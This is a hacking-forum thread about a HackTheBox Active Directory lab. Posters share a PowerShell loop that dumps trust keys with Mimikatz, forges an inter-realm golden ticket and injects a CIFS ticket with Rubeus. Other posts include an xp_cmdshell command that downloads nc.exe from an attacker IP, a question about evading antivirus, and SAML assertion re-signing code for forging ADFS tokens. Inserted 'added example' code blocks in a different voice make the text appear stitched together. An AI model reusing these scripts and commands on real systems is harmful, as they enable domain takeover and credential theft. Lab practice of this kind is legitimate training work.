Posts: 24
Threads: 2
Joined: Jun 2024
Jul 16, 2024, 10:26 AM
(This post was last modified: Jul 16, 2024, 10:33 AM by wh1t3_r4bb1t.)
How to bypass AV for nc.exe? AV removes my nc.exe every time, from any folder in the system: Documents, Downloads, etc. I was trying different binaries, also with 0 results.
UPD. nvm, this one works fine: https://dl.packetstormsecurity.net/group...sum/nc.exe
Posts: 8
Threads: 1
Joined: Jan 2024
Hmmm... just got out of prison after being banned for LEECHING (?). I promise the Mod to contribute after getting out of this jail.
If anyone is still struggling to make the TGS work, start a new session or use `klist purge`, have mimikatz & Rubeus ready (change the paths if needed), then run the following script; you can then access the remote resources on the DC:
# Define the paths to the Mimikatz and Rubeus executables
$mimikatzPath = ".\mimikatz.exe"
$rubeusPath   = ".\Rubeus.exe"

# Define the Mimikatz and Rubeus commands.
# lsadump::trust /patch dumps the trust keys; the /rc4 value below is the trust key
# used to forge an inter-realm ticket (/service:krbtgt /target:GHOST.HTB) whose
# SID history (/sids) carries RID 519 (Enterprise Admins) of the other domain.
$mimikatzTrustCmd  = '"lsadump::trust /patch" exit'
$mimikatzGoldenCmd = '"kerberos::golden /user:Administrator /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-179904498 /sids:S-1-5-21-4084500788-938703357-3654145966-519 /rc4:dae1ad83e2af14a379017f244a2f5297 /service:krbtgt /target:GHOST.HTB /ticket:axura.kirbi" exit'
# Rubeus exchanges the forged ticket for a CIFS service ticket on dc01 and injects it (/ptt)
$rubeusCmd = "/ticket:axura.kirbi /dc:dc01.ghost.htb /service:CIFS/dc01.ghost.htb /nowrap /ptt"

# Define the directory to check
$targetDirectory = "\\dc01.ghost.htb\c$"

# Function to run a command and wait for it to complete (output is discarded)
function Run-Command {
    param (
        [string]$cmd
    )
    & cmd /c $cmd | Out-Null
}

# Loop to keep trying until access is granted
while ($true) {
    try {
        # Run Mimikatz to dump trust information and create the Golden Ticket
        Run-Command "$mimikatzPath $mimikatzTrustCmd"
        Run-Command "$mimikatzPath $mimikatzGoldenCmd"

        # Run Rubeus to request the TGS and apply the ticket
        Run-Command "$rubeusPath asktgs $rubeusCmd"

        # Check if we can access the directory
        $access = Test-Path $targetDirectory
        if ($access) {
            Write-Host "Access granted to $targetDirectory"
            dir $targetDirectory
            break
        } else {
            Write-Host "Access denied. Purging tickets and retrying..."
            klist purge
        }
    } catch {
        Write-Host "An error occurred: $_"
        klist purge
    }
}
P.S. If anyone knows any contactable HTB employees for banning issues, please PM me... Thank you (not leeching).
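A check worth running before the `Test-Path` in the script above, as an added example (not part of the post, and not Mimikatz or Rubeus code): parse the current logon session's ticket cache with the built-in `klist.exe` and confirm that a service ticket for the requested SPN is present and not yet expired, so a failed share access can be told apart from a ticket that never made it into the cache. The klist block embedded at the bottom is constructed for an offline dry run; the function and parameter names are mine, and the date parsing assumes klist prints times in the current culture's format.

```powershell
# Added example: inspect the Kerberos ticket cache of the current logon session.
# Parses klist.exe output into objects; -KlistOutput lets you feed captured text.
function Get-KerbTicketCache {
    param([string[]]$KlistOutput = (& klist.exe))
    $tickets = @()
    $current = $null
    foreach ($line in $KlistOutput) {
        switch -Regex ($line) {
            # "#0>     Client: Administrator @ CORP.GHOST.HTB" starts a new entry
            '^#\d+>\s+Client:\s*(.+)$' {
                if ($current) { $tickets += $current }
                $current = [ordered]@{ Client = $Matches[1].Trim() }
            }
            '^\s+Server:\s*(.+)$' {
                if ($current) { $current.Server = $Matches[1].Trim() }
            }
            '^\s+KerbTicket Encryption Type:\s*(.+)$' {
                if ($current) { $current.EncType = $Matches[1].Trim() }
            }
            # "End Time:   7/16/2024 20:26:00 (local)"; parsed in the current culture
            '^\s+End Time:\s*(.+?)\s*\(local\)' {
                if ($current) { $current.EndTime = [datetime]::Parse($Matches[1]) }
            }
        }
    }
    if ($current) { $tickets += $current }
    $tickets | ForEach-Object { [pscustomobject]$_ }
}

# True when a non-expired ticket for $Spn (optionally in $Realm) is cached.
function Test-KerbServiceTicket {
    param(
        [Parameter(Mandatory)][string]$Spn,   # e.g. cifs/dc01.ghost.htb
        [string]$Realm,                        # e.g. GHOST.HTB
        [string[]]$KlistOutput
    )
    $cache = if ($KlistOutput) { Get-KerbTicketCache -KlistOutput $KlistOutput }
             else               { Get-KerbTicketCache }
    $hit = $cache | Where-Object {
        $_.Server -like "$Spn @ *" -and
        (-not $Realm -or $_.Server -like "* @ $Realm") -and
        $_.EndTime -gt (Get-Date)
    }
    return [bool]$hit
}

# Constructed klist output (not captured from a real host) for an offline dry run.
$sample = @(
    'Cached Tickets: (1)', '',
    '#0>     Client: Administrator @ CORP.GHOST.HTB',
    '        Server: cifs/dc01.ghost.htb @ GHOST.HTB',
    '        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)',
    '        Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize',
    "        Start Time: $((Get-Date).ToString()) (local)",
    "        End Time:   $((Get-Date).AddHours(8).ToString()) (local)",
    '        Session Key Type: RSADSI RC4-HMAC(NT)'
)
Test-KerbServiceTicket -Spn 'cifs/dc01.ghost.htb' -Realm 'GHOST.HTB' -KlistOutput $sample
Test-KerbServiceTicket -Spn 'cifs/dc01.ghost.htb' -Realm 'CORP.GHOST.HTB' -KlistOutput $sample
```

In the retry loop, call `Test-KerbServiceTicket -Spn 'cifs/dc01.ghost.htb' -Realm 'GHOST.HTB'` right after the Rubeus step: if it returns `$false`, the `asktgs` exchange failed (wrong trust key, wrong SIDs, clock skew) and purging plus retrying is the right move; if it returns `$true` but `Test-Path` still fails, the problem is authorization on the share, not the ticket.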
Posts: 32
Threads: 0
Joined: Jul 2023
(Jul 16, 2024, 09:08 AM)jsvensson Wrote: Two things:
Does anyone know the steps for the intended path?
I know this is not about the box, but does anybody know why I get an nginx "forbidden" when I try to answer a private message?
Yes, there's a hint in the intranet, within the conversation between kathryn.holland and justin.bradley. The user florence has some additional privileges to change the infrastructure.
Then the next steps are pretty much obvious from the BloodHound graph. Eventually you'll get back to the MSSQL part.
This forum account is currently banned. Ban Length: Permanent (N/A Remaining) Ban Reason: Leeching.
Posts: 21
Threads: 0
Joined: Apr 2024
Jul 16, 2024, 05:50 PM
(This post was last modified: Jul 16, 2024, 05:51 PM by standby123.)
Anyone have any idea on the ADFS?
It accepts the response with a different message signature, but the problem is that when trying to re-sign the assertion it returns 500.
Posts: 32
Threads: 0
Joined: Jul 2023
(Jul 16, 2024, 05:50 PM)standby123 Wrote: Anyone have any idea on the ADFS?
It accepts the response with a different message signature, but the problem is that when trying to re-sign the assertion it returns 500.
You gotta use the gMSA to sign your message and then it will be accepted by ADFS.
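The re-signing step the two posts above argue about, as an added example (my code, not from the thread and not ADFS's own): strip the existing XML-DSig from the `saml:Assertion`, re-sign the assertion with an RSA-SHA256 enveloped signature in the layout ADFS emits (Signature placed after Issuer, exclusive C14N, SHA-256 digest), and verify the result locally before sending it, so a malformed signature is caught on your side instead of as an HTTP 500 from the server. It assumes the token-signing private key is already in hand as a PFX file (the thread says it has to be the gMSA's signing key; how that key is obtained is not on the page), that the Response XML is in a file, and that .NET Framework 4.6.2 or later is available; the file paths and parameter names are placeholders.

```powershell
# Added example: re-sign a SAML 2.0 Assertion with an RSA-SHA256 enveloped XML-DSig.
# Assumptions (not from the thread): token-signing key available as a PFX,
# Response XML in a file; all paths below are placeholders.
param(
    [string]$ResponsePath = '.\response.xml',
    [string]$PfxPath      = '.\token-signing.pfx',
    [string]$PfxPassword  = '',
    [string]$OutPath      = '.\response.signed.xml'
)
Add-Type -AssemblyName System.Security   # System.Security.Cryptography.Xml

$samlNs = 'urn:oasis:names:tc:SAML:2.0:assertion'
$dsNs   = 'http://www.w3.org/2000/09/xmldsig#'

$doc = New-Object System.Xml.XmlDocument
$doc.PreserveWhitespace = $true          # canonicalization must see the document as-is
$doc.Load((Resolve-Path $ResponsePath).Path)

$ns = New-Object System.Xml.XmlNamespaceManager($doc.NameTable)
$ns.AddNamespace('saml', $samlNs)
$ns.AddNamespace('ds',   $dsNs)

$assertion = $doc.SelectSingleNode('//saml:Assertion', $ns)
if (-not $assertion) { throw 'No saml:Assertion found in the Response' }

# Remove the old assertion signature: after editing, its digest no longer matches.
$old = $assertion.SelectSingleNode('ds:Signature', $ns)
if ($old) { [void]$assertion.RemoveChild($old) }

$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2(
    (Resolve-Path $PfxPath).Path, $PfxPassword,
    [System.Security.Cryptography.X509Certificates.X509KeyStorageFlags]::Exportable)
# GetRSAPrivateKey (an extension method, hence the static call) returns an RSA
# object that SignedXml can use with RSA-SHA256 on .NET 4.6.2+.
$rsa = [System.Security.Cryptography.X509Certificates.RSACertificateExtensions]::GetRSAPrivateKey($cert)

$signedXml = New-Object System.Security.Cryptography.Xml.SignedXml($assertion)
$signedXml.SigningKey = $rsa
$signedXml.SignedInfo.CanonicalizationMethod = [System.Security.Cryptography.Xml.SignedXml]::XmlDsigExcC14NTransformUrl
$signedXml.SignedInfo.SignatureMethod = 'http://www.w3.org/2001/04/xmldsig-more#rsa-sha256'

# One Reference to the assertion by its ID attribute, enveloped + exc-c14n transforms.
$ref = New-Object System.Security.Cryptography.Xml.Reference
$ref.Uri = '#' + $assertion.GetAttribute('ID')
$ref.DigestMethod = 'http://www.w3.org/2001/04/xmlenc#sha256'
$ref.AddTransform((New-Object System.Security.Cryptography.Xml.XmlDsigEnvelopedSignatureTransform))
$ref.AddTransform((New-Object System.Security.Cryptography.Xml.XmlDsigExcC14NTransform))
$signedXml.AddReference($ref)

# Embed the signing certificate so the relying party can match it against metadata.
$keyInfo = New-Object System.Security.Cryptography.Xml.KeyInfo
$keyInfo.AddClause((New-Object System.Security.Cryptography.Xml.KeyInfoX509Data($cert)))
$signedXml.KeyInfo = $keyInfo

$signedXml.ComputeSignature()
$sig = $doc.ImportNode($signedXml.GetXml(), $true)

# SAML schema order inside an Assertion: Issuer, then Signature, then the rest.
$issuer = $assertion.SelectSingleNode('saml:Issuer', $ns)
[void]$assertion.InsertAfter($sig, $issuer)

# Self-check: verify the signature we just produced before sending it anywhere.
$check = New-Object System.Security.Cryptography.Xml.SignedXml($assertion)
$check.LoadXml($sig)
if (-not $check.CheckSignature($cert, $true)) { throw 'Signature self-check failed' }

$doc.Save((Join-Path (Get-Location).Path $OutPath))
Write-Host "Re-signed assertion written to $OutPath"
```

The self-check only proves the signature is internally consistent; acceptance still depends on the certificate matching what the relying party trusts, which is the point the reply makes about using the gMSA's key. Only the Assertion is re-signed here, matching the observation in the thread that the outer Response signature was not what got rejected; if the Response element carries its own `ds:Signature`, that one has to be removed or re-signed the same way, since its digest covers the assertion you just changed.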
Posts: 1
Threads: 0
Joined: Jul 2024
Jul 16, 2024, 08:01 PM
(This post was last modified: Jul 16, 2024, 08:04 PM by lostoceanghost.)
SQL >[primary] (sa dbo@master)> xp_cmdshell "echo IWR http://10.10.x.x/nc.exe -OutFile %TEMP%\nc.exe | powershell -noprofile"
output
--------------------------------------------------------------------------------
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
NULL
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
NULL
PS C:\Windows\system32> IWR http://10.10.x.x/nc.exe -OutFile C:\Windows\SERVIC~1\MSSQLS~1\AppData\Local\Temp\nc.exe
IWR : The operation has timed out.
At line:1 char:1
+ IWR http://10.10.x.x/nc.exe -OutFile C:\Windows\SERVIC~1\MSSQLS~1\A ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (System.Net.HttpWebRequest:HttpWebRequest) [Invoke-WebRequest], WebException
+ FullyQualifiedErrorId : WebCmdletWebResponseException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand
SQL >[primary] (sa dbo@master)> xp_cmdshell copy \\10.10.x.x\share\nc.exe %TEMP%\nc.exe
output
-------------------------------------
An unexpected network error occurred.
0 file(s) copied.
NULL
Yesterday I was able to upload the same file. Now it just freezes for a couple of minutes before throwing an error. Although I receive a connection, I can't upload even an empty text file. I also haven't been able to access federation.ghost.htb since then. In the first days after release AD FS worked just fine; at that time I could at least access the login form. Now it takes forever to load.
Anyone experiencing the same problems? Any suggestions? I've restarted the box several times.
Posts: 21
Threads: 0
Joined: Apr 2024
(Jul 16, 2024, 07:15 PM)cutearmadillo Wrote: (Jul 16, 2024, 05:50 PM)standby123 Wrote: Anyone have any idea on the ADFS?
It accepts the response with a different message signature, but the problem is that when trying to re-sign the assertion it returns 500.
You gotta use the gMSA to sign your message and then it will be accepted by ADFS.
I am in GHOST-CORP; do I need to access the DC?
Posts: 32
Threads: 0
Joined: Jul 2023
(Jul 16, 2024, 09:46 PM)standby123 Wrote: (Jul 16, 2024, 07:15 PM)cutearmadillo Wrote: (Jul 16, 2024, 05:50 PM)standby123 Wrote: Anyone have any idea on the ADFS?
It accepts the response with a different message signature, but the problem is that when trying to re-sign the assertion it returns 500.
You gotta use the gMSA to sign your message and then it will be accepted by ADFS.
I am in GHOST-CORP; do I need to access the DC?
If you are in GHOST-CORP already then you do not need ADFS anymore.
Posts: 219
Threads: 14
Joined: Apr 2024
Guys, is the Mist machine OSEP prep or more advanced?
This forum account is currently banned. Ban Length: Permanent (N/A Remaining) Ban Reason: Asking for rep is not allowed
Posts: 116
Threads: 6
Joined: Mar 2024
Jul 17, 2024, 01:40 AM
(This post was last modified: Jul 17, 2024, 01:45 AM by mazafaka555.)
(Jul 16, 2024, 03:15 PM)Axura Wrote: Hmmm... just got out of prison after being banned for LEECHING (?). I promise the Mod to contribute after getting out of this jail.
If anyone is still struggling to make the TGS work, start a new session or use `klist purge`, have mimikatz & Rubeus ready (change the paths if needed), then run the following script; you can then access the remote resources on the DC:
[...]
P.S. If anyone knows any contactable HTB employees for banning issues, please PM me... Thank you (not leeching).
This is an auto-ban, don't worry. They don't give a shit about your contribution/activity and never will... they want you to buy a VIP or VIP+ account. That's all.
They have a script which checks every day for "Free" users, and if they have 31+ messages you get an auto-ban for "Leeching".
(Jul 16, 2024, 10:35 PM)osamy7593 Wrote: Guys, is the Mist machine OSEP prep or more advanced?
More advanced; it's a "Red Teaming" machine.